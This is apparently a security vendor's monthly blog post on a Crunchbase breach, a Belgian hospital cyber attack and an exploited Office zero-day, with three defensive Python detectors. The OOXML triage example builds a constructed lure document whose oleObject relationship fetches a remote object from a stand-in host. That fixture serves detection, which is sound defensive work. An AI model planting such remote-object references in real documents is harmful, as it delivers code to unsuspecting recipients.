
Cybersecurity Insights series: January 2026 – this month in cybersecurity

Craig

Welcome back to our Cybersecurity Insights blog, where we break down the most impactful cyber events shaping today’s threat landscape. January 2026 began with significant turbulence across the digital ecosystem, highlighting once again how cybercriminals continue to exploit trust, technology, and operational dependencies across industries.

Craig Lusher examines three major incidents that captured attention this month.

Crunchbase breach: ShinyHunters exfiltrate over 2 million records

Market intelligence platform Crunchbase confirmed a substantial data breach after the ShinyHunters cybercrime group published a 400MB archive of compressed files and stolen data online. The attackers claim to have accessed over 2 million personal and corporate records, including PII, contracts, and internal documentation. The intrusion was part of a broader campaign that has also impacted platforms such as SoundCloud and Betterment.

Crunchbase reported that while business operations were not disrupted, a threat actor had exfiltrated “certain documents” from the corporate network and published them following a failed extortion attempt. The organisation is now working with federal authorities and cybersecurity experts to assess the scope of exposure.

C8 Secure perspective

Breaches of this nature commonly trace back to credential compromise or social engineering, and cloud-hosted SaaS platforms are particularly exposed when single sign-on is misconfigured or not backed by phishing-resistant MFA. The exfiltration of over 2 million records also suggests, although the public reporting does not confirm it, that the attackers had sustained access before being detected, which points to gaps in monitoring for unusual data movement. This is exactly the kind of activity a well-tuned SIEM with behavioral analytics should catch: an authentication anomaly, such as a login from a location or device the account has never used, correlated with a data transfer volume far outside that account's normal baseline, surfaced before it reaches this scale.
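The correlation described above, as an added example that is not C8 Secure's M-SOC logic and uses constructed telemetry rather than anything from the Crunchbase incident: a per-user baseline of login countries and daily egress volume is built from six days of events, and on the seventh day a user is scored on two independent signals, a login from a never-before-seen country and an egress volume beyond both mean plus three standard deviations and a minimum multiple of the mean. The user names, countries and byte counts are all invented; the minimum-multiple guard is there because a zero-variance baseline would otherwise make any increase look anomalous.

```python
"""Correlate authentication anomalies with abnormal data egress per user.

Added example with constructed telemetry; it is not C8 Secure's M-SOC logic
and not data from the Crunchbase incident.
"""
from collections import defaultdict
from statistics import mean, pstdev

# Constructed sample telemetry. Days 1-6 form the baseline; day 7 is evaluated.
# Authentication events: (day, user, source_country, auth_method)
AUTH_EVENTS = [
    *[(d, "alice", "US", "fido2") for d in range(1, 7)],
    *[(d, "bob", "GB", "push") for d in range(1, 7)],
    *[(d, "carol", "US", "push") for d in range(1, 7)],
    (7, "alice", "US", "fido2"),
    (7, "bob", "NG", "push"),      # bob has never logged in from NG before
    (7, "carol", "US", "push"),
]
# Data-access events: (day, user, bytes returned by the records API)
EGRESS_EVENTS = [
    *[(d, "alice", 40_000_000 + d * 1_000_000) for d in range(1, 7)],
    *[(d, "bob", 30_000_000) for d in range(1, 7)],
    *[(d, "carol", 25_000_000) for d in range(1, 7)],
    (7, "alice", 42_000_000),
    (7, "bob", 2_100_000_000),     # roughly 70x bob's daily baseline
    (7, "carol", 9_000_000_000),   # huge, but from carol's usual country
]
BASELINE_DAYS = range(1, 7)
EVAL_DAY = 7


def baseline_profiles(auth_events, egress_events, baseline_days):
    """Per-user baseline: countries seen and daily egress mean/stddev."""
    countries = defaultdict(set)
    daily_bytes = defaultdict(list)
    for day, user, country, _method in auth_events:
        if day in baseline_days:
            countries[user].add(country)
    for day, user, nbytes in egress_events:
        if day in baseline_days:
            daily_bytes[user].append(nbytes)
    profiles = {}
    for user in set(countries) | set(daily_bytes):
        samples = daily_bytes.get(user) or [0]
        profiles[user] = {
            "countries": countries.get(user, set()),
            "mean": mean(samples),
            "sigma": pstdev(samples),
        }
    return profiles


def correlate(auth_events, egress_events, baseline_days, eval_day,
              sigma=3.0, min_ratio=3.0):
    """Return {user: alert} for users showing an auth anomaly, a volume
    anomaly, or both. Severity is 'high' only when the two coincide."""
    profiles = baseline_profiles(auth_events, egress_events, baseline_days)
    new_country = {}
    for day, user, country, _method in auth_events:
        known = profiles.get(user, {}).get("countries", set())
        if day == eval_day and country not in known:
            new_country[user] = country
    egress_today = defaultdict(int)
    for day, user, nbytes in egress_events:
        if day == eval_day:
            egress_today[user] += nbytes

    alerts = {}
    for user in set(new_country) | set(egress_today):
        p = profiles.get(user, {"countries": set(), "mean": 0.0, "sigma": 0.0})
        nbytes = egress_today.get(user, 0)
        # mean + k*sigma alone is useless when the baseline has zero variance
        # (bob), so also require a minimum multiple of the mean. A user with
        # no baseline at all (mean 0) is flagged on any egress.
        threshold = max(p["mean"] + sigma * p["sigma"], min_ratio * p["mean"])
        signals = []
        if user in new_country:
            signals.append(f"login from new country {new_country[user]}")
        if nbytes > threshold:
            ratio = nbytes / p["mean"] if p["mean"] else float("inf")
            signals.append(f"egress {ratio:.0f}x baseline ({nbytes} bytes)")
        if signals:
            alerts[user] = {
                "severity": "high" if len(signals) == 2 else "medium",
                "signals": signals,
            }
    return alerts


if __name__ == "__main__":
    for user, alert in correlate(AUTH_EVENTS, EGRESS_EVENTS,
                                 BASELINE_DAYS, EVAL_DAY).items():
        print(user, alert)
```

Run as a script it reports bob as high severity (new country plus roughly 70x his usual volume), carol as medium (large transfer, familiar location) and nothing for alice. In a real SIEM the same two signals would be joined on the session or token identifier rather than the user name, so that a stolen session used from a new network is caught even when the legitimate user is also active.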

Our own M-SOC service integrates with over 800 external threat feeds for this reason, and our Cyber Threat Exchange gives customers in regulated industries early visibility into credential dumps and dark web activity that often precede these campaigns. The voice-based social engineering element of these campaigns is also worth noting. Groups like ShinyHunters increasingly use vishing to bypass technical controls entirely, which is why we run tailored vishing and phishing simulations through our SafeBait program. Technology alone won't solve this if staff aren't prepared for the call that sounds entirely legitimate.

AZ Monica Hospital, Belgium: Ransomware disruption halts operations

Belgium’s AZ Monica Hospital suffered a severe cyber attack that forced the shutdown of all IT systems across its Antwerp and Deurne campuses. The incident caused widespread operational disruption, including the cancellation of scheduled surgeries, a halt to electronic patient records, and the transfer of critical-care patients to nearby hospitals with Red Cross support.

The hospital proactively shut down servers to contain the attack, resulting in reduced emergency department capacity and a temporary shift to manual processes for patient registration. Local reports suggest ransomware may be involved, though this has not been officially confirmed.

C8 Secure perspective

When an organisation is forced to cancel surgeries and redirect patients, it is a reminder that ransomware is not just an IT problem but an operational and safety issue. The pattern here is familiar: attackers gain access, move laterally, and deploy encryption across production systems before anyone intervenes. The time between initial access and deployment is where defenders have the best opportunity to act, but only if monitoring is continuous and response is fast enough.

Our approach through the M-SOC combines 24/7 analyst coverage with automated containment through our SOAR platform, which can isolate compromised endpoints within seconds rather than waiting for manual escalation. At the endpoint level, behavioral detection is what matters most against ransomware: catching the encryption behavior itself, such as a single process rewriting large numbers of files in quick succession, rather than relying on known signatures. That said, detection is only half the picture. Many organisations discover during an incident that their network segmentation is inadequate, or that their backup restoration process has never been properly tested. Regular security assessments and penetration testing help identify these weaknesses before an attacker does. Healthcare may have been the target here, but any organisation dependent on real-time system access faces the same risk profile.
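The behavioral approach described above, as an added example that is not C8 Secure's endpoint or SOAR code and runs over a constructed file-event stream rather than telemetry from the AZ Monica incident: a sliding-window detector keyed by process fires when one process has, within ten seconds, both written twenty or more files whose content has near-maximum entropy and renamed twenty or more files to a new extension. Requiring both signals is the point of the example; a backup agent writing compressed chunks produces the same entropy profile but no renames, so it is left alone. The hostname, process names, paths, thresholds and the `isolate_host` stand-in for the containment call are all assumptions.

```python
"""Flag a process whose file activity looks like bulk encryption.

Added example over a constructed file-event stream; it is not C8 Secure's
endpoint or SOAR logic and not telemetry from the AZ Monica incident.
"""
import math
from collections import Counter, defaultdict, deque


def shannon_entropy(data: bytes) -> float:
    """Bits per byte; English text sits around 4-5, ciphertext close to 8."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def _ext(path: str) -> str:
    return path.rsplit(".", 1)[-1].lower() if "." in path else ""


def isolate_host(host: str) -> dict:
    """Stand-in for the SOAR containment call; it only records the decision."""
    return {"host": host, "action": "network_isolate"}


class EncryptionBehaviorDetector:
    """Sliding-window detector keyed by pid. Raises one alert when, within
    window_s seconds, a process has both written >= min_writes files with
    high-entropy content and renamed >= min_renames files to a new extension.
    Requiring both keeps backup/compression agents (high entropy, no renames)
    from tripping it."""

    def __init__(self, window_s=10.0, min_writes=20, min_renames=20,
                 entropy_threshold=7.0):
        self.window_s = window_s
        self.min_writes = min_writes
        self.min_renames = min_renames
        self.entropy_threshold = entropy_threshold
        self._events = defaultdict(deque)   # pid -> deque of (t, kind)
        self._alerted = set()

    def feed(self, ev):
        """ev: dict with t, host, pid, image, op ('write'|'rename'), path and
        either data (write) or new_path (rename). Returns an alert or None."""
        kind = None
        if ev["op"] == "write" and shannon_entropy(ev["data"]) >= self.entropy_threshold:
            kind = "hi_entropy_write"
        elif ev["op"] == "rename" and _ext(ev["path"]) != _ext(ev["new_path"]):
            kind = "ext_rename"
        if kind is None:
            return None
        q = self._events[ev["pid"]]
        q.append((ev["t"], kind))
        while q and ev["t"] - q[0][0] > self.window_s:   # drop events outside the window
            q.popleft()
        writes = sum(1 for _, k in q if k == "hi_entropy_write")
        renames = sum(1 for _, k in q if k == "ext_rename")
        if (writes >= self.min_writes and renames >= self.min_renames
                and ev["pid"] not in self._alerted):
            self._alerted.add(ev["pid"])
            return {"pid": ev["pid"], "image": ev["image"], "t": ev["t"],
                    "hi_entropy_writes": writes, "ext_renames": renames,
                    "action": isolate_host(ev["host"])}
        return None


def run_stream(events, detector):
    """Feed events in time order and collect the alerts raised."""
    return [a for a in (detector.feed(e) for e in sorted(events, key=lambda e: e["t"])) if a]


# Constructed sample data: deterministic high- and low-entropy payloads.
CIPHERTEXT_LIKE = bytes(range(256)) * 16             # entropy exactly 8.0
PLAINTEXT_LIKE = b"Patient admitted 08:15, stable. " * 128

EVENTS = []
for i in range(30):   # suspect process: write ciphertext, then rename to .locked
    p = f"C:/Shares/Radiology/report{i}.docx"
    EVENTS.append({"t": i * 0.1, "host": "WS-RAD-07", "pid": 4242, "image": "svchost_.exe",
                   "op": "write", "path": p, "data": CIPHERTEXT_LIKE})
    EVENTS.append({"t": i * 0.1 + 0.05, "host": "WS-RAD-07", "pid": 4242, "image": "svchost_.exe",
                   "op": "rename", "path": p, "new_path": p + ".locked"})
for i in range(40):   # backup agent: high entropy, no renames -> not flagged
    EVENTS.append({"t": i * 0.1, "host": "WS-RAD-07", "pid": 900, "image": "backupagent.exe",
                   "op": "write", "path": f"D:/backup/chunk{i}.bin", "data": CIPHERTEXT_LIKE})
for i in range(3):    # word processor saving plain-text notes
    EVENTS.append({"t": 1.0 + i, "host": "WS-RAD-07", "pid": 1200, "image": "winword.exe",
                   "op": "write", "path": f"C:/Users/dr/notes{i}.txt", "data": PLAINTEXT_LIKE})

if __name__ == "__main__":
    for alert in run_stream(EVENTS, EncryptionBehaviorDetector()):
        print(alert)
```

The one alert lands on pid 4242 about two seconds into the stream, at the twentieth rename, which is the dwell-time argument in miniature: the first few files are already lost, but the share is not. Real ransomware families vary the pattern (some rename first, some never rename, some use a driver rather than a user-mode process), so production detectors add further signals such as canary files and shadow-copy deletion rather than relying on these two alone.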

Microsoft Office Zero-Day: Emergency patch issued amid active exploitation

Microsoft released an out-of-band emergency patch for CVE-2026-21509, a high-severity zero-day vulnerability actively exploited in the wild. The flaw lets attackers bypass the COM/OLE security controls in Microsoft Office and Microsoft 365, so a malicious document can execute code once a user opens it.

Attackers must convince a victim to open a specially crafted Office file, typically delivered via highly targeted phishing or social engineering. Office 2021 and later versions are protected automatically by server-side controls, but users of Office 2016 and 2019 must apply the patch manually or implement Microsoft's registry-based mitigations. The vulnerability has been added to CISA's Known Exploited Vulnerabilities catalogue, with federal agencies required to patch by February 16, 2026.

C8 Secure perspective

Document-based attacks remain effective because they exploit something no patch can fully fix: people open Office attachments as part of their daily work. The attacker's challenge is simply making the email convincing enough, and targeted social engineering has become very good at that. From a defensive standpoint, two things matter here. First, endpoint protection needs to catch malicious embedded objects and macros before they execute, not after. Machine learning-based detection that analyses a document's structure and behavior pre-execution is more reliable than signature-based approaches for a zero-day like this one, because no signature exists until the exploit has already been seen. Second, patching speed makes a real difference.

Organisations still running Office 2016 or 2019 face a manual patching burden that creates extended exposure windows, and our SOC analysts actively monitor for exploitation indicators tied to newly disclosed CVEs so that detection rules can be updated quickly. On the human side, regular simulation exercises that train staff to spot coercive or urgent email tactics reduce the likelihood of someone opening the malicious document in the first place. None of these measures work in isolation, but taken together they significantly narrow the window of opportunity for this type of attack.
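Pre-execution inspection of the kind discussed above, as an added example that is neither C8 Secure's detection engine nor a machine-learning model: it opens an Office Open XML document as the zip container it is and flags the structures a COM/OLE-based lure depends on (an OLE, template or frame relationship that points outside the package, an embedded object part, a VBA project) before Office ever parses the file. The two documents are built in-line and are constructed; the host 203.0.113.7 is a documentation address, not an indicator from this campaign, and the block/review/allow policy is an assumption.

```python
"""Pre-execution triage of an Office Open XML document.

Added example, not C8 Secure's detection engine and not an ML model: it
inspects the container's structure for the delivery mechanisms a COM/OLE
lure depends on before anything is opened in Office.
"""
import io
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
# Relationship types that should not point outside the package in a document
# received by e-mail; ordinary hyperlinks are deliberately excluded.
EXTERNAL_REL_TYPES = ("oleObject", "attachedTemplate", "frame")


def triage_ooxml(blob: bytes) -> dict:
    """Return {'verdict': allow|review|block, 'findings': [(kind, detail)]}."""
    findings = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(blob))
    except zipfile.BadZipFile:
        return {"verdict": "review", "findings": [("not_ooxml", "not a zip container")]}
    with zf:
        for name in zf.namelist():
            low = name.lower()
            if low.endswith("vbaproject.bin"):
                findings.append(("vba_project", name))
            elif "/embeddings/" in low:
                findings.append(("embedded_object", name))
            if not low.endswith(".rels"):
                continue
            try:
                root = ET.fromstring(zf.read(name))
            except ET.ParseError:
                findings.append(("malformed_rels", name))
                continue
            for rel in root.iter(f"{REL_NS}Relationship"):
                rtype = rel.get("Type", "").rsplit("/", 1)[-1]
                if rel.get("TargetMode") == "External" and rtype in EXTERNAL_REL_TYPES:
                    findings.append(("external_relationship",
                                     f"{name}: {rtype} -> {rel.get('Target')}"))
    kinds = {k for k, _ in findings}
    if kinds & {"external_relationship", "vba_project"}:
        verdict = "block"          # policy assumption: quarantine for analyst review
    elif kinds:
        verdict = "review"
    else:
        verdict = "allow"
    return {"verdict": verdict, "findings": findings}


def build_docx(parts: dict) -> bytes:
    """Assemble a minimal .docx from {part_name: bytes}."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in parts.items():
            zf.writestr(name, data)
    return buf.getvalue()


# Constructed documents (not real samples). 203.0.113.7 is a documentation address.
_CT = b"""<?xml version="1.0" encoding="UTF-8"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">
<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
<Default Extension="xml" ContentType="application/xml"/>
<Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>
</Types>"""
_ROOT_RELS = b"""<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/>
</Relationships>"""
_DOC = b"""<?xml version="1.0" encoding="UTF-8"?>
<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"><w:body><w:p><w:r><w:t>Invoice</w:t></w:r></w:p></w:body></w:document>"""
_BENIGN_DOC_RELS = b"""<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"/>"""
_SUSPECT_DOC_RELS = b"""<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="http://203.0.113.7/update.ole" TargetMode="External"/>
</Relationships>"""

BASE_PARTS = {"[Content_Types].xml": _CT, "_rels/.rels": _ROOT_RELS, "word/document.xml": _DOC}
BENIGN_DOCX = build_docx({**BASE_PARTS, "word/_rels/document.xml.rels": _BENIGN_DOC_RELS})
SUSPECT_DOCX = build_docx({**BASE_PARTS, "word/_rels/document.xml.rels": _SUSPECT_DOC_RELS,
                           "word/embeddings/oleObject1.bin": b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 56})

if __name__ == "__main__":
    print("benign :", triage_ooxml(BENIGN_DOCX))
    print("suspect:", triage_ooxml(SUSPECT_DOCX))
```

Structural triage of this sort is cheap enough to run at the mail gateway on every attachment, which is where it pays off for a zero-day: it does not need to know the bug, only that an invoice has no business fetching an OLE object from the internet. It covers the OOXML container only; RTF and the legacy binary formats embed OLE objects differently and need their own parsers, which is one more reason the patch, not the filter, is the fix.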

Final thoughts

January 2026 reinforces a familiar truth: cyber threats continue to evolve rapidly, targeting the intersection of human trust, critical infrastructure, and ubiquitous enterprise software. Whether it’s high-volume data exfiltration, operational disruption in life-critical environments, or targeted exploitation of widely deployed productivity tools, organisations must adopt layered defences, rapid detection and response capabilities, and resilient operational planning.

Cybersecurity solutions for a safer tomorrow

For more information on how C8 Secure can support your cybersecurity initiatives, email info@c8secure.com or fill out our Contact Us page.
